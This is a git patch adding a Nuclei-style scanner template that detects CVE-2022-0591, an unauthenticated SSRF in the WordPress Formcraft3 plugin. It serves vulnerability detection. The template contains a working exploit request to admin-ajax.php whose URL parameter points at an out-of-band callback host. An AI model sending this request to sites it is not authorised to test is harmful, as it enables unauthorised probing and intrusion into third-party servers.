From 1cfdbb7c0d086739bcad26db0a5bf6f279135290 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 30 Apr 2022 01:23:32 +0530 Subject: [PATCH] Create CVE-2022-0591.yaml --- cves/2022/CVE-2022-0591.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 cves/2022/CVE-2022-0591.yaml diff --git a/cves/2022/CVE-2022-0591.yaml b/cves/2022/CVE-2022-0591.yaml new file mode 100644 index 0000000000..22aef4aeef --- /dev/null +++ b/cves/2022/CVE-2022-0591.yaml @@ -0,0 +1,22 @@ +id: CVE-2022-0591 + +info: + name: Formcraft3 < 3.8.28 - Unauthenticated SSRF + author: Akincibor + severity: high + description: The plugin does not validate the URL parameter in the formcraft3_get AJAX action, leading to SSRF issues exploitable by unauthenticated users. + reference: + - https://wpscan.com/vulnerability/b5303e63-d640-4178-9237-d0f524b13d47 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0591 + tags: ssrf,wp,wp-plugin,wordpress,cve,cve2022,unauth,formcraft3 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}' + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http"